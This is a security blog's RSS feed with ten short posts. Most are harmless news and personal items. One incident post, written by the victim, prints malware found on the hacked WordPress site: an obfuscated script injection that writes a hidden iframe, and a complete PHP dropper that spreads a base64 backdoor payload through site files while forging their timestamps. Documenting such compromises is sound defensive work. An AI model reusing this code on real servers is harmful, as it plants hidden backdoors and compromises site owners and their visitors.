<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Phocean.net / Computer Security &#187; News</title>
	<atom:link href="http://www.phocean.net/category/news/feed" rel="self" type="application/rss+xml" />
	<link>http://www.phocean.net</link>
	<description>&#34;A defense that hedgehogs possess is the ability to roll into a tight ball, causing all of the spines to point outwards.&#34; -- Wikipedia</description>
	<lastBuildDate>Wed, 30 Nov 2011 22:02:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Acquisitions among SIEM actors</title>
		<link>http://www.phocean.net/2011/10/04/acquisitions-among-siem-actors.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=acquisitions-among-siem-actors</link>
		<comments>http://www.phocean.net/2011/10/04/acquisitions-among-siem-actors.html#comments</comments>
		<pubDate>Tue, 04 Oct 2011 17:14:13 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[Defense]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Arcsight]]></category>
		<category><![CDATA[correlation]]></category>
		<category><![CDATA[Gartner]]></category>
		<category><![CDATA[log]]></category>
		<category><![CDATA[SIEM]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=1167</guid>
		<description><![CDATA[The SIEM planet has recently gone crazy. Following the acquisition of the leader, Arcsight, by HP last year, IBM just acquired Q1 Labs&#8230; and Mc Afee, Nitrosecurity ! With RSA and Norton having their own solutions, we know have 5 big players in the arena (see Gartner 2011). This is a good proof that the [...]]]></description>
			<content:encoded><![CDATA[<p>The <strong>SIEM</strong> planet has recently gone crazy. Following the acquisition of the leader, <a title="HP to acquire" href="http://www.hp.com/hpinfo/newsroom/press/2010/100913xa.html" target="_blank">Arcsight, by HP</a> last year, <a title="IBM to acquire Q1 Labs" href="http://www.net-security.org/secworld.php?id=11729" target="_blank">IBM just acquired Q1 Labs</a>&#8230; and <a title="Mc Afee to acquire Nitrosecurity" href="http://www.net-security.org/secworld.php?id=11727" target="_blank">Mc Afee, Nitrosecurity</a> !</p>
<p>With RSA and Norton having their own solutions, we know have 5 big players in the arena (see <a title="Gartner Magic Quadrant 2011" href="http://www.arcsight.com/collateral/whitepapers/Gartner_Magic_Quadrant_2011.pdf">Gartner 2011</a>). This is a good proof that the correlation market is growing and that the solutions are getting mature.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2011/10/04/acquisitions-among-siem-actors.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A link between Stuxnet and the OpenBSD IPSEC backdoor rumor ?</title>
		<link>http://www.phocean.net/2011/01/16/a-link-between-stuxnet-and-the-openbsd-ipsec-backdoor-rumor.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=a-link-between-stuxnet-and-the-openbsd-ipsec-backdoor-rumor</link>
		<comments>http://www.phocean.net/2011/01/16/a-link-between-stuxnet-and-the-openbsd-ipsec-backdoor-rumor.html#comments</comments>
		<pubDate>Sun, 16 Jan 2011 22:12:53 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[Malware forensics]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[IPSEC]]></category>
		<category><![CDATA[OpenBSD]]></category>
		<category><![CDATA[stuxnet]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=967</guid>
		<description><![CDATA[Found on Full Disclosure, a weired but troubling connection of two security affairs : the OpenBSD backdoor rumor and the stuxnet worm.]]></description>
			<content:encoded><![CDATA[<p>Found on Full Disclosure, a weired but troubling connection of two security affairs : <a title="OpenBSD backdoor and stuxnet" href="http://extendedsubset.com/?p=43" target="_blank">the OpenBSD backdoor rumor and the stuxnet worm</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2011/01/16/a-link-between-stuxnet-and-the-openbsd-ipsec-backdoor-rumor.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Homepage mascotte, here and now !</title>
		<link>http://www.phocean.net/2011/01/16/homepage-mascotte-here-and-now.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=homepage-mascotte-here-and-now</link>
		<comments>http://www.phocean.net/2011/01/16/homepage-mascotte-here-and-now.html#comments</comments>
		<pubDate>Sun, 16 Jan 2011 03:28:14 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Off-topic]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=955</guid>
		<description><![CDATA[Well, following a suggestion from my wife, I decided to bring up a mascotte for this website. I admit that it was a lot of fun playing with Gimp and Inkscape, which are really great tools. So please welcome our new little spiky friend : I hope that you have nothing against hedgehogs, which should [...]]]></description>
			<content:encoded><![CDATA[<p>Well, following a suggestion from my wife, I decided to bring up a mascotte for this website.<br />
I admit that it was a lot of fun playing with Gimp and Inkscape, which are really great tools.</p>
<p>So please welcome our new little spiky friend :</p>
<p><img class="aligncenter size-full wp-image-956" title="hello world" src="http://www.phocean.net/wp-content/uploads/2011/01/hello-world.png" alt="" width="266" height="132" /></p>
<p>I hope that you have nothing against hedgehogs, which should be inspiring the security industry !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2011/01/16/homepage-mascotte-here-and-now.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OpenID rants</title>
		<link>http://www.phocean.net/2010/07/23/openid-rants.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=openid-rants</link>
		<comments>http://www.phocean.net/2010/07/23/openid-rants.html#comments</comments>
		<pubDate>Fri, 23 Jul 2010 03:44:37 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Authentication]]></category>
		<category><![CDATA[OpenID]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=877</guid>
		<description><![CDATA[After I tried to set this blog as my own OpenID provider using the OpenID WordPress plugin, I got a weired error message: &#8220;This is an OpenID Server, Nothing to See Here&#8230; Move Along&#8221; I could not find what as wrong, as all prerequisites were fulfilled, until I find this nice post. The patch there [...]]]></description>
			<content:encoded><![CDATA[<p>After I tried to set this blog as my own OpenID provider using the <a title="OpenID WordPress Plugin" href="http://wordpress.org/extend/plugins/openid/" target="_blank">OpenID WordPress plugin</a>, I got a weired error message:</p>
<p><em>&#8220;This is an OpenID Server, Nothing to See Here&#8230; Move  Along&#8221;</em></p>
<p>I could not find what as wrong, as all prerequisites were fulfilled, until I find this <a title="openID server" href="http://patchlog.com/wordpress/openid-server-on-php-5-3/" target="_blank">nice post</a>. The patch there works very well, thanks to the author (it is a shame that it wasn&#8217;t yet included in the trunk).</p>
<p>This and the lack of active open-source development around OpenID seems to show that it is not really popular. It is a shame because it is a pretty good solution against the multiplication of passwords. I wouldn&#8217;t want to use OpenID for my bank account access, but it is just right for many sites, forums, etc. Unfortunately, no many sites are yet OpenID enabled and the choice when you want to become your own provider is very limited (most of projects listed in the official wiki are dead, with no update for the last 2 years).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2010/07/23/openid-rants.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Downtimes: a hardware problem</title>
		<link>http://www.phocean.net/2010/04/07/downtimes-a-hardware-problem.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=downtimes-a-hardware-problem</link>
		<comments>http://www.phocean.net/2010/04/07/downtimes-a-hardware-problem.html#comments</comments>
		<pubDate>Wed, 07 Apr 2010 18:07:24 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[Admin]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[openSUSE]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=784</guid>
		<description><![CDATA[You may have noticed that the site had a lot of downtimes recently. I was having a daily kernel panic and weired file system corruptions, which I first tought were coming from the successive crashes and reboots. However, while it happened again and again and I could not find any good reason for that, I [...]]]></description>
			<content:encoded><![CDATA[<p>You may have noticed that the site had a lot of downtimes recently.</p>
<p>I was having a daily kernel panic and weired file system corruptions, which I first tought were coming from the successive crashes and reboots.</p>
<p>However, while it happened again and again and I could not find any good reason for that, I became more doubtful about my hardware and finally found the culprit.<br />
I booted on Memtest, installed with zypper from the repo, which immediately displayed a lot of errors. The tedious task of isolating the faulty memory module revealed that it was one from a Ballistix bundle that I bought just 3 months ago.</p>
<p>I usually use Kingston or Corsair and never had such a problem, but maybe I was just lucky. I will test now the customer service of Ballistix.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2010/04/07/downtimes-a-hardware-problem.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My new toy</title>
		<link>http://www.phocean.net/2010/03/16/my-new-tool.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=my-new-tool</link>
		<comments>http://www.phocean.net/2010/03/16/my-new-tool.html#comments</comments>
		<pubDate>Tue, 16 Mar 2010 21:16:47 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Off-topic]]></category>
		<category><![CDATA[openSUSE]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=751</guid>
		<description><![CDATA[No, it is not a computer this time. And yes, it is off topic, but I wanted to thank a Japanese friend for his gift and, at the same time, promote his work : He owns a small company in Hokkaido producing a number of wood toys. He is an artist and designs them, which [...]]]></description>
			<content:encoded><![CDATA[<p>No, it is not a computer this time. And yes, it is off topic, but I wanted to thank a Japanese friend for his gift and, at the same time, promote his work :</p>
<p style="text-align: center;"><a href="http://www.phocean.net/wp-content/uploads/2010/03/P1020041-320x200.jpg"><img class="size-full wp-image-752  aligncenter" title="Milcar" src="http://www.phocean.net/wp-content/uploads/2010/03/P1020041-320x200.jpg" alt="" width="267" height="200" /></a></p>
<p>He owns a <a title="Milcar" href="http://www.milcar.jp/">small company</a> in Hokkaido producing a number of wood toys. He is an artist and designs them, which are all hand made and from the local wood.</p>
<p>In our industrial society, where all toys are made of plastic in chinese factories, it is refreshing to see such authentic and nice wood toys.</p>
<p>So think about it for your kids. His website is only in Japanese for now but if you are interested, drop an e-mail and my friend will certainly answer to you shortly (last link in the <a title="Milcar" href="http://www.milcar.jp/">menu page</a>).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2010/03/16/my-new-tool.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Donation to Unicef</title>
		<link>http://www.phocean.net/2008/10/11/donation-to-unicef.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=donation-to-unicef</link>
		<comments>http://www.phocean.net/2008/10/11/donation-to-unicef.html#comments</comments>
		<pubDate>Sat, 11 Oct 2008 19:54:52 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[donation]]></category>
		<category><![CDATA[unicef]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=264</guid>
		<description><![CDATA[I chose to donate the last Google Adsense income of the blog to Unicef. If you can donate, please make a tour there :]]></description>
			<content:encoded><![CDATA[<p>I chose to donate the last Google Adsense income of the blog to Unicef. If you can donate, please make a tour there :</p>
<p style="text-align: center"><a title="Unicef" rel="attachment wp-att-62" href="http://www.phocean.net/?attachment_id=62"><img src="http://www.phocean.net/wp-content/uploads/2007/06/unicef.png" alt="Unicef" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2008/10/11/donation-to-unicef.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ryan Farmer is a spammer</title>
		<link>http://www.phocean.net/2008/08/15/ryan-farmer-is-a-spammer.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ryan-farmer-is-a-spammer</link>
		<comments>http://www.phocean.net/2008/08/15/ryan-farmer-is-a-spammer.html#comments</comments>
		<pubDate>Fri, 15 Aug 2008 14:23:55 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Ryan Farmer]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=233</guid>
		<description><![CDATA[For those who still don&#8217;t know, Ryan Farmer would be a spammer and a liar. Quite embarassing to be caught like that. Maybe all this is a lot of noise, but such people deserve a good lesson of living in society. Really.]]></description>
			<content:encoded><![CDATA[<p>For those who still don&#8217;t know, <a title="Ryan Farmer is a spammer" href="http://www.fooishbar.org/blog/tech/ryan-farmer-2008-08-14-21-24.html" target="_blank">Ryan Farmer would be a spammer and a liar</a>.</p>
<p>Quite embarassing to be caught like that. Maybe all this is a lot of noise, but such people deserve a good lesson of living in society. Really.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2008/08/15/ryan-farmer-is-a-spammer.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacked !</title>
		<link>http://www.phocean.net/2008/06/03/hacked.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hacked</link>
		<comments>http://www.phocean.net/2008/06/03/hacked.html#comments</comments>
		<pubDate>Tue, 03 Jun 2008 20:25:25 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=109</guid>
		<description><![CDATA[This blog got hacked yesterday. It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress. It was not just like the classic SQL injection that is usually used to post some malicious post. The following code was added : It make me think that there is a [...]]]></description>
			<content:encoded><![CDATA[<p>This blog got hacked yesterday.</p>
<p>It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.<br />
It was not just like the classic SQL injection that is usually used to post some malicious post.</p>
<p>The following code was added :</p>
<pre class="brush: php; title: ; notranslate">&lt;?php echo '&lt;script type=&quot;text/javascript&quot;&gt;function count(str){var res = &quot;&quot;;for(i = 0; i &lt; str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(&quot;&gt;khtcog\&quot;ute?jvvr&lt;11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\&quot;ykfvj?3\&quot;jgkijv?3\&quot;htcogdqtfgt?2@&quot;));&lt;/script&gt;';?&gt;</pre>
<p><span id="more-109"></span></p>
<p>It make me think that there is a serious vulnerability somewhere on WordPress or a plugin, though my versions were up-to-date.</p>
<p>Now the blog is back to normal, after a clean reinstallation (erased all the former files).</p>
<p><a title="Wordpress, hacked" href="http://wordpress.org/support/topic/179428/page/2" target="_blank">I am not the only one to experience this mess</a>.</p>
<p>For now, the blog is running with a minimal number of plugin &#8211; just akismet, actually &#8211; until the cause of that gets clearer.</p>
<p>Not a lot of plugins runned before, so it mainly means that the OpenID support for authentication is cut off.</p>
<p>As my php knowledge is very low, anyone having some tips is welcome. I love WordPress, I would like to avoid looking for another platform or switch to static html !</p>
<p>&#8211;</p>
<p><strong>UPDATE 06/13/2008 :</strong><br />
As C.S Lee suggested in a comment, there were a very suspicious wp-stats.php file in the root of my hacked archive.</p>
<p>There is the code :</p>
<pre class="brush: php; title: ; notranslate">
&lt;?php

@error_reporting(E_ALL);
@set_time_limit(0);
mt_srand(crc32(microtime()));

define('SHCODE', 'PDaWYgKCRjb2RlID0gQGZyZWFkKEBmb3BlbigkSFRUCmVjaG8gIjwvcHJlPiI7Cj8+');

$pres = array('lib_','co_','pre_','net_','func_','ad_','ext_','new_','old_','fix_','fixed_','na_','av_','fx_');
$fui = $pres[array_rand($pres)];

global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8, 7, 6, 6, 5, 5, 5, 5, 0);

function my_fwrite($f, $data) {
  global $CURFILE;
  $file_mtime = @filemtime($f);
  $file_atime = @fileatime($f);
  $dir_mtime = @filemtime(@dirname($f));
  $dir_atime = @fileatime(@dirname($f));
  if ($file_h = @fopen($f, &quot;wb&quot;)) {
    @fwrite($file_h, $data); @fclose($file_h);
    if ($file_mtime) {
      @touch($f, $file_mtime, $file_atime);
    } elseif (@filemtime($CURFILE)) {
      @chmod($f, @fileperms($CURFILE));
      @touch($f, @filemtime($CURFILE), @fileatime($CURFILE));
      @chgrp($f, @filegroup($CURFILE));
      @chown($f, @fileowner($CURFILE));
    };
    if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
    return $f;
  } else {
    return '';
  };
};

function ext($f) {
  return substr($f, strrpos($f, &quot;.&quot;) + 1);
};

function walkdir($p, $func='_walkdir', $l=0) {
  global $START;
  global $WD_TIMEOUT;
  global $FL;
  $func_f = &quot;{$func}_f&quot;;
  $func_d = &quot;{$func}_d&quot;;
  $func_s = &quot;{$func}_s&quot;;
  $func_e = &quot;{$func}_e&quot;;
  if ($dh = @opendir(&quot;$p&quot;)) {
    if (function_exists($func_s)) {
      if ($func_s($p, $l)) return 1;
    };
    while ($f = @readdir($dh)) {
      if (time() - $START &gt;= $WD_TIMEOUT[$l] ) break;
      if ($f == '.' || $f == '..' ) continue;
      if (@is_dir (&quot;$p$f/&quot;) ) walkdir(&quot;$p$f/&quot;, $func, $l+1);
      if (@is_dir (&quot;$p$f/&quot;) &amp;&amp; function_exists($func_d))
        $func_d(&quot;$p$f/&quot;, $l);
      if (@is_file(&quot;$p$f&quot; ) &amp;&amp; function_exists($func_f))
        $func_f(&quot;$p$f&quot; , $l);
    };
    closedir($dh);
    if (function_exists($func_e)) $func_e($p, $l);
  };
};

function r_cut($p) {
  global $R;
  return substr($p, strlen($R));
};

function say($t) {
  echo &quot;$t\n&quot;;
};

function testdata($t) {
  say(md5(&quot;mark_$t&quot;));
};

$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'] .
  $HTTP_SERVER_VARS['SCRIPT_NAME'];
echo &quot;&lt;pre&gt;&quot;;
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
//$FN = &quot;namogofer.$fe&quot;;

function _walkdir_s($d, $l) {
  global $FCNT;
  $FCNT = array( 'fn' =&gt; '', 'dir' =&gt; 0, 'file' =&gt; 0, 'simtype' =&gt; 0 );
};

function _walkdir_d($d,$l) {
  global $FCNT;
  $FCNT['dir' ]++;
};

function _walkdir_f($f,$l) {
  global $FCNT, $CURFILE;
  $FCNT['file']++;
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};

function update_passwd($data)
  {
  global $FCNT;
  $password = &quot;&quot;;
  $possible = &quot;abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&amp;*&quot;;
  $i = 0;
  while ($i &lt; 15)
    {
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char))
      {
      $password .= $char;
      $i++;
      }
    }
  $FCNT['passwd'] = $password;
  $md5password = md5($password);
  return preg_replace(&quot;|define\('PASSWD',\s*'(.*)'|&quot;, &quot;define('PASSWD','$md5password'&quot;, $data);
  }

function notinf($ar, $tx)
  {
  $R = true;
  foreach ($ar as $ca)
    {
    //echo &quot;pass &quot;.substr($tx, 0, strlen($ca)).&quot; in $tx for $ca\n&quot;;
    if (&quot;$ca&quot; == substr($tx, 0, strlen($ca)))
      {
      $R = false;
      //echo &quot;gotcha\n&quot;;
      break;
      }
    }
  return $R;
  }

function _walkdir_e($d,$l)
  {
  global $C, $FCNT, $FN, $fui, $pres;

    $the_data = base64_decode(SHCODE);
    $the_dir = opendir(&quot;$d&quot;);
    $is_php=false;
    if ($the_dir)
        while($cfile = readdir($the_dir))
            {
            if(
                $is_php=

                (('.php' == substr($cfile, -4))and
                 notinf($pres, $cfile)and
                ($cfile!='index.php'))

              )
              {
              $FN = &quot;$fui$cfile&quot;;
              break;
              }
              else
              {
              //echo &quot;pass $cfile\n&quot;;
              }
            }

        if ( $is_php and my_fwrite(&quot;$d$FN&quot;, str_repeat(&quot;\n&quot;,100) . str_repeat('', 150) .
                    update_passwd($the_data . str_repeat(' ', 150) . &quot;\n&quot; . str_repeat(&quot;\n&quot;, 100))))
                    {
                    $FCNT['fn'] = r_cut(&quot;$d$FN&quot;);
                    say(implode(&quot; &quot;, $FCNT));
                    }

  };

walkdir(&quot;$R/&quot;);
testdata('end');
?&gt;</pre>
<p>I will try anyway to put a deeper look when I have a little time : now, I have to go to work.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2008/06/03/hacked.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>My article in the magazine, Hakin9</title>
		<link>http://www.phocean.net/2008/04/16/104.html?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=104</link>
		<comments>http://www.phocean.net/2008/04/16/104.html#comments</comments>
		<pubDate>Wed, 16 Apr 2008 20:41:03 +0000</pubDate>
		<dc:creator>phocean</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Hackin9]]></category>
		<category><![CDATA[Network attacks]]></category>

		<guid isPermaLink="false">http://www.phocean.net/?p=104</guid>
		<description><![CDATA[I am proud that my first article for a computer magazine was published. The magazine, Hakin9, is specialized into Security and Hacking. My article was an overall introduction to network attacks. Some day, I will probably post an english translation around here. It was an interesting and exciting exercise, like writing on this blog. I [...]]]></description>
			<content:encoded><![CDATA[<p>I am proud that my first article for a computer magazine was published.</p>
<p>The magazine, <a title="Hakin9 magazine" href="http://www.hakin9.org" target="_blank">Hakin9</a>, is specialized into Security and Hacking. My article was an overall<a title="Introduction to network attacks" href="http://www.hakin9.org/prt/view/nos-numers/issue/793.html"> <strong>introduction to network attacks</strong></a>. Some day, I will probably post an english translation around here.</p>
<p>It was an interesting and exciting exercise, like writing on this blog. I wish I can afford enough time and do it more often.</p>
<p style="text-align: center;"><a title="Hakin9 - my article" href="http://www.hakin9.org/prt/view/nos-numers/issue/793.html"><img class="aligncenter" src="http://www.hakin9.org//files/haking/Cover/hakin9_starter_kit_FR.jpg" alt="Hakin9 magazine" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.phocean.net/2008/04/16/104.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

